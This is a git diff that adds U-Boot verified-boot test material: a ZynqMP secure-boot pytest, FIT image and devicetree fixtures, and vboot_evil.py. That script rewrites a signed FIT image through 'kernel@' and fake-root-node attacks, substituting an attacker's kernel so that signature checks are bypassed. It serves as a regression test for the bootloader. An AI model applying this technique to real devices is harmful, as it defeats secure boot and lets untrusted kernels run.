image at the DDR address for + authentication only case. + """ + + f = ubman.config.env.get('env__zynqmp_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynqmp secure cases to read') + + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = ubman.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + output = ubman.run_command('zynqmp secure %x $filesize' % (addr)) + assert 'Verified image at' in output + ver_addr = re.search(r'Verified image at 0x(.+)', output).group(1) + output = ubman.run_command('echo $?') + assert output.endswith('0') + output = ubman.run_command('print zynqmp_verified_img_addr') + assert f'zynqmp_verified_img_addr={ver_addr}' in output + assert 'Error' not in output + + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_secure_boot_img_kup(ubman): + """This test verifies secure boot image at the DDR address for encryption + with kup key case. + """ + + f = ubman.config.env.get('env__zynqmp_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynqmp secure cases to read') + + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + keyaddr = f.get('keyaddr', None) + if not keyaddr: + addr = utils.find_ram_base(ubman) + expected_tftp = 'Bytes transferred = ' + keyfn = f['keyfn'] + output = ubman.run_command('tftpboot %x %s' % (keyaddr, keyfn)) + assert expected_tftp in output + + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + expected_tftp = 'Bytes transferred = ' + fn = f['enckupfn'] + output = ubman.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + output = ubman.run_command( + 'zynqmp secure %x $filesize %x' % (addr, keyaddr) + ) + assert 'Verified image at' in output + ver_addr = re.search(r'Verified image at 0x(.+)', output).group(1) + output = ubman.run_command('echo $?') + assert output.endswith('0') + output = ubman.run_command('print zynqmp_verified_img_addr') + assert f'zynqmp_verified_img_addr={ver_addr}' in output + assert 'Error' not in output diff --git a/test/py/tests/vboot/hash-images.its b/test/py/tests/vboot/hash-images.its new file mode 100644 index 00000000000..3ff797288c2 --- /dev/null +++ b/test/py/tests/vboot/hash-images.its @@ -0,0 +1,76 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-0 { + algo = "crc16-ccitt"; + }; + hash-1 { + algo = "crc32"; + }; + hash-2 { + algo = "md5"; + }; + hash-3 { + algo = "sha1"; + }; + hash-4 { + algo = "sha256"; + }; + hash-5 { + algo = "sha384"; + }; + hash-6 { + algo = "sha512"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-0 { + algo = "crc16-ccitt"; + }; + hash-1 { + algo = "crc32"; + }; + hash-2 { + algo = "md5"; + }; + hash-3 { + algo = "sha1"; + }; + hash-4 { + algo = "sha256"; + }; + hash-5 { + algo = "sha384"; + }; + hash-6 { + algo = "sha512"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-binman-pss.dts b/test/py/tests/vboot/sandbox-binman-pss.dts new file mode 100644 index 00000000000..56e3a42fa6f --- /dev/null +++ b/test/py/tests/vboot/sandbox-binman-pss.dts @@ -0,0 +1,25 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + binman { + filename = "sandbox.img"; + + pre-load { + content = <&image>; + algo-name = "sha256,rsa2048"; + padding-name = "pss"; + key-name = "dev.key"; + header-size = <4096>; + version = <1>; + }; + + image: blob-ext { + filename = "test.fit"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-binman.dts b/test/py/tests/vboot/sandbox-binman.dts new file mode 100644 index 00000000000..b24aeba0fa8 --- /dev/null +++ b/test/py/tests/vboot/sandbox-binman.dts @@ -0,0 +1,24 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + binman { + filename = "sandbox.img"; + + pre-load { + content = <&image>; + algo-name = "sha256,rsa2048"; + key-name = "dev.key"; + header-size = <4096>; + version = <1>; + }; + + image: blob-ext { + filename = "test.fit"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-kernel.dts b/test/py/tests/vboot/sandbox-kernel.dts new file mode 100644 index 00000000000..a1e853c9caa --- /dev/null +++ b/test/py/tests/vboot/sandbox-kernel.dts @@ -0,0 +1,7 @@ +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + +}; diff --git a/test/py/tests/vboot/sandbox-u-boot-global-pss.dts b/test/py/tests/vboot/sandbox-u-boot-global-pss.dts new file mode 100644 index 00000000000..c59a68221b9 --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot-global-pss.dts @@ -0,0 +1,28 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; + + image { + pre-load { + sig { + algo-name = "sha256,rsa2048"; + padding-name = "pss"; + signature-size = <256>; + mandatory = "yes"; + + key-name = "dev"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-u-boot-global.dts b/test/py/tests/vboot/sandbox-u-boot-global.dts new file mode 100644 index 00000000000..1409f9e1a10 --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot-global.dts @@ -0,0 +1,27 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; + + image { + pre-load { + sig { + algo-name = "sha256,rsa2048"; + signature-size = <256>; + mandatory = "yes"; + + key-name = "dev"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-u-boot.dts b/test/py/tests/vboot/sandbox-u-boot.dts new file mode 100644 index 00000000000..5809c62fc1c --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot.dts @@ -0,0 +1,13 @@ +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-algo-arg.its b/test/py/tests/vboot/sign-configs-algo-arg.its new file mode 100644 index 00000000000..3a5bb6d0f73 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-algo-arg.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha1-pss.its b/test/py/tests/vboot/sign-configs-sha1-pss.its new file mode 100644 index 00000000000..72a5637e3a1 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha1-pss.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha1.its b/test/py/tests/vboot/sign-configs-sha1.its new file mode 100644 index 00000000000..d8bc1fa0919 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha1.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256-pss-prod.its b/test/py/tests/vboot/sign-configs-sha256-pss-prod.its new file mode 100644 index 00000000000..aac732e304c --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256-pss-prod.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "prod"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256-pss.its b/test/py/tests/vboot/sign-configs-sha256-pss.its new file mode 100644 index 00000000000..7bdcc7e286f --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256-pss.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256.its b/test/py/tests/vboot/sign-configs-sha256.its new file mode 100644 index 00000000000..f5591aad305 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha384.its b/test/py/tests/vboot/sign-configs-sha384.its new file mode 100644 index 00000000000..2869401991e --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha384.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha384"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha384"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-algo-arg.its b/test/py/tests/vboot/sign-images-algo-arg.its new file mode 100644 index 00000000000..9144c8b5ad8 --- /dev/null +++ b/test/py/tests/vboot/sign-images-algo-arg.its @@ -0,0 +1,40 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha1-pss.its b/test/py/tests/vboot/sign-images-sha1-pss.its new file mode 100644 index 00000000000..ded7ae4f552 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha1-pss.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha1.its b/test/py/tests/vboot/sign-images-sha1.its new file mode 100644 index 00000000000..18c759e9e65 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha1.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha256-pss.its b/test/py/tests/vboot/sign-images-sha256-pss.its new file mode 100644 index 00000000000..34850cc6c58 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha256-pss.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha256.its b/test/py/tests/vboot/sign-images-sha256.its new file mode 100644 index 00000000000..bb0f8ee8a66 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha256.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha384.its b/test/py/tests/vboot/sign-images-sha384.its new file mode 100644 index 00000000000..be1a9a653c7 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha384.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/simple-images.its b/test/py/tests/vboot/simple-images.its new file mode 100644 index 00000000000..f62786456b8 --- /dev/null +++ b/test/py/tests/vboot/simple-images.its @@ -0,0 +1,36 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot_evil.py b/test/py/tests/vboot_evil.py new file mode 100644 index 00000000000..e2b0cd65468 --- /dev/null +++ b/test/py/tests/vboot_evil.py @@ -0,0 +1,486 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2020, Intel Corporation + +"""Modifies a devicetree to add a fake root node, for testing purposes""" + +import hashlib +import struct +import sys + +FDT_PROP = 0x3 +FDT_BEGIN_NODE = 0x1 +FDT_END_NODE = 0x2 +FDT_END = 0x9 + +FAKE_ROOT_ATTACK = 0 +KERNEL_AT = 1 + +MAGIC = 0xd00dfeed + +EVIL_KERNEL_NAME = b'evil_kernel' +FAKE_ROOT_NAME = b'f@keroot' + + +def getstr(dt_strings, off): + """Get a string from the devicetree string table + + Args: + dt_strings (bytes): Devicetree strings section + off (int): Offset of string to read + + Returns: + str: String read from the table + """ + output = '' + while dt_strings[off]: + output += chr(dt_strings[off]) + off += 1 + + return output + + +def align(offset): + """Align an offset to a multiple of 4 + + Args: + offset (int): Offset to align + + Returns: + int: Resulting aligned offset (rounds up to nearest multiple) + """ + return (offset + 3) & ~3 + + +def determine_offset(dt_struct, dt_strings, searched_node_name): + """Determines the offset of an element, either a node or a property + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + searched_node_name (str): element path, ex: /images/kernel@1/data + + Returns: + tuple: (node start offset, node end offset) + if element is not found, returns (None, None) + """ + offset = 0 + depth = -1 + + path = '/' + + object_start_offset = None + object_end_offset = None + object_depth = None + + while offset < len(dt_struct): + (tag,) = struct.unpack('>I', dt_struct[offset:offset + 4]) + + if tag == FDT_BEGIN_NODE: + depth += 1 + + begin_node_offset = offset + offset += 4 + + node_name = getstr(dt_struct, offset) + offset += len(node_name) + 1 + offset = align(offset) + + if path[-1] != '/': + path += '/' + + path += str(node_name) + + if path == searched_node_name: + object_start_offset = begin_node_offset + object_depth = depth + + elif tag == FDT_PROP: + begin_prop_offset = offset + + offset += 4 + len_tag, nameoff = struct.unpack('>II', + dt_struct[offset:offset + 8]) + offset += 8 + prop_name = getstr(dt_strings, nameoff) + + len_tag = align(len_tag) + + offset += len_tag + + node_path = path + '/' + str(prop_name) + + if node_path == searched_node_name: + object_start_offset = begin_prop_offset + + elif tag == FDT_END_NODE: + offset += 4 + + path = path[:path.rfind('/')] + if not path: + path = '/' + + if depth == object_depth: + object_end_offset = offset + break + depth -= 1 + elif tag == FDT_END: + break + + else: + print('unknown tag=0x%x, offset=0x%x found!' % (tag, offset)) + break + + return object_start_offset, object_end_offset + + +def modify_node_name(dt_struct, node_offset, replcd_name): + """Change the name of a node + + Args: + dt_struct (bytes): Devicetree struct section + node_offset (int): Offset of node + replcd_name (str): New name for node + + Returns: + bytes: New dt_struct contents + """ + + # skip 4 bytes for the FDT_BEGIN_NODE + node_offset += 4 + + node_name = getstr(dt_struct, node_offset) + node_name_len = len(node_name) + 1 + + node_name_len = align(node_name_len) + + replcd_name += b'\0' + + # align on 4 bytes + while len(replcd_name) % 4: + replcd_name += b'\0' + + dt_struct = (dt_struct[:node_offset] + replcd_name + + dt_struct[node_offset + node_name_len:]) + + return dt_struct + + +def modify_prop_content(dt_struct, prop_offset, content): + """Overwrite the value of a property + + Args: + dt_struct (bytes): Devicetree struct section + prop_offset (int): Offset of property (FDT_PROP tag) + content (bytes): New content for the property + + Returns: + bytes: New dt_struct contents + """ + # skip FDT_PROP + prop_offset += 4 + (len_tag, nameoff) = struct.unpack('>II', + dt_struct[prop_offset:prop_offset + 8]) + + # compute padded original node length + original_node_len = len_tag + 8 # content length + prop meta data len + + original_node_len = align(original_node_len) + + added_data = struct.pack('>II', len(content), nameoff) + added_data += content + while len(added_data) % 4: + added_data += b'\0' + + dt_struct = (dt_struct[:prop_offset] + added_data + + dt_struct[prop_offset + original_node_len:]) + + return dt_struct + + +def change_property_value(dt_struct, dt_strings, prop_path, prop_value, + required=True): + """Change a given property value + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + prop_path (str): full path of the target property + prop_value (bytes): new property name + required (bool): raise an exception if property not found + + Returns: + bytes: New dt_struct contents + + Raises: + ValueError: if the property is not found + """ + (rt_node_start, _) = determine_offset(dt_struct, dt_strings, prop_path) + if rt_node_start is None: + if not required: + return dt_struct + raise ValueError('Fatal error, unable to find prop %s' % prop_path) + + dt_struct = modify_prop_content(dt_struct, rt_node_start, prop_value) + + return dt_struct + +def change_node_name(dt_struct, dt_strings, node_path, node_name): + """Change a given node name + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + node_path (str): full path of the target node + node_name (str): new node name, just node name not full path + + Returns: + bytes: New dt_struct contents + + Raises: + ValueError: if the node is not found + """ + (rt_node_start, rt_node_end) = ( + determine_offset(dt_struct, dt_strings, node_path)) + if rt_node_start is None or rt_node_end is None: + raise ValueError('Fatal error, unable to find root node') + + dt_struct = modify_node_name(dt_struct, rt_node_start, node_name) + + return dt_struct + +def get_prop_value(dt_struct, dt_strings, prop_path): + """Get the content of a property based on its path + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + prop_path (str): full path of the target property + + Returns: + bytes: Property value + + Raises: + ValueError: if the property is not found + """ + (offset, _) = determine_offset(dt_struct, dt_strings, prop_path) + if offset is None: + raise ValueError('Fatal error, unable to find prop') + + offset += 4 + (len_tag,) = struct.unpack('>I', dt_struct[offset:offset + 4]) + + offset += 8 + tag_data = dt_struct[offset:offset + len_tag] + + return tag_data + + +def kernel_at_attack(dt_struct, dt_strings, kernel_content, kernel_hash): + """Conduct the kernel@ attack + + It fetches from /configurations/default the name of the kernel being loaded. + Then, if the kernel name does not contain any @sign, duplicates the kernel + in /images node and appends '@evil' to its name. + It inserts a new kernel content and updates its images digest. + + Inputs: + - FIT dt_struct + - FIT dt_strings + - kernel content blob + - kernel hash blob + + Important note: it assumes the U-Boot loading method is 'kernel' and the + loaded kernel hash's subnode name is 'hash-1' + """ + + # retrieve the default configuration name + default_conf_name = get_prop_value( + dt_struct, dt_strings, '/configurations/default') + default_conf_name = str(default_conf_name[:-1], 'utf-8') + + conf_path = '/configurations/' + default_conf_name + + # fetch the loaded kernel name from the default configuration + loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel') + + loaded_kernel = str(loaded_kernel[:-1], 'utf-8') + + if loaded_kernel.find('@') != -1: + print('kernel@ attack does not work on nodes already containing an @ sign!') + sys.exit() + + # determine boundaries of the loaded kernel + (krn_node_start, krn_node_end) = (determine_offset( + dt_struct, dt_strings, '/images/' + loaded_kernel)) + if krn_node_start is None and krn_node_end is None: + print('Fatal error, unable to find root node') + sys.exit() + + # copy the loaded kernel + loaded_kernel_copy = dt_struct[krn_node_start:krn_node_end] + + # insert the copy inside the tree + dt_struct = dt_struct[:krn_node_start] + \ + loaded_kernel_copy + dt_struct[krn_node_start:] + + evil_kernel_name = loaded_kernel+'@evil' + + # change the inserted kernel name + dt_struct = change_node_name( + dt_struct, dt_strings, '/images/' + loaded_kernel, bytes(evil_kernel_name, 'utf-8')) + + # change the content of the kernel being loaded + dt_struct = change_property_value( + dt_struct, dt_strings, '/images/' + evil_kernel_name + '/data', kernel_content) + + # change the content of the kernel being loaded + dt_struct = change_property_value( + dt_struct, dt_strings, '/images/' + evil_kernel_name + '/hash-1/value', kernel_hash) + + return dt_struct + + +def fake_root_node_attack(dt_struct, dt_strings, kernel_content, kernel_digest): + """Conduct the fakenode attack + + It duplicates the original root node at the beginning of the tree. + Then it modifies within this duplicated tree: + - The loaded kernel name + - The loaded kernel data + + Important note: it assumes the UBoot loading method is 'kernel' and the loaded kernel + hash's subnode name is hash@1 + """ + + # retrieve the default configuration name + default_conf_name = get_prop_value( + dt_struct, dt_strings, '/configurations/default') + default_conf_name = str(default_conf_name[:-1], 'utf-8') + + conf_path = '/configurations/'+default_conf_name + + # fetch the loaded kernel name from the default configuration + loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel') + + loaded_kernel = str(loaded_kernel[:-1], 'utf-8') + + # determine root node start and end: + (rt_node_start, rt_node_end) = (determine_offset(dt_struct, dt_strings, '/')) + if (rt_node_start is None) or (rt_node_end is None): + print('Fatal error, unable to find root node') + sys.exit() + + # duplicate the whole tree + duplicated_node = dt_struct[rt_node_start:rt_node_end] + + # dchange root name (empty name) to fake root name + new_dup = change_node_name(duplicated_node, dt_strings, '/', FAKE_ROOT_NAME) + + dt_struct = new_dup + dt_struct + + # change the value of /<fake_root_name>/configs/<default_config_name>/kernel + # so our modified kernel will be loaded + base = '/' + str(FAKE_ROOT_NAME, 'utf-8') + value_path = base + conf_path+'/kernel' + dt_struct = change_property_value(dt_struct, dt_strings, value_path, + EVIL_KERNEL_NAME + b'\0') + + # change the node of the /<fake_root_name>/images/<original_kernel_name> + images_path = base + '/images/' + node_path = images_path + loaded_kernel + dt_struct = change_node_name(dt_struct, dt_strings, node_path, + EVIL_KERNEL_NAME) + + # change the content of the kernel being loaded + data_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/data' + dt_struct = change_property_value(dt_struct, dt_strings, data_path, + kernel_content, required=False) + + 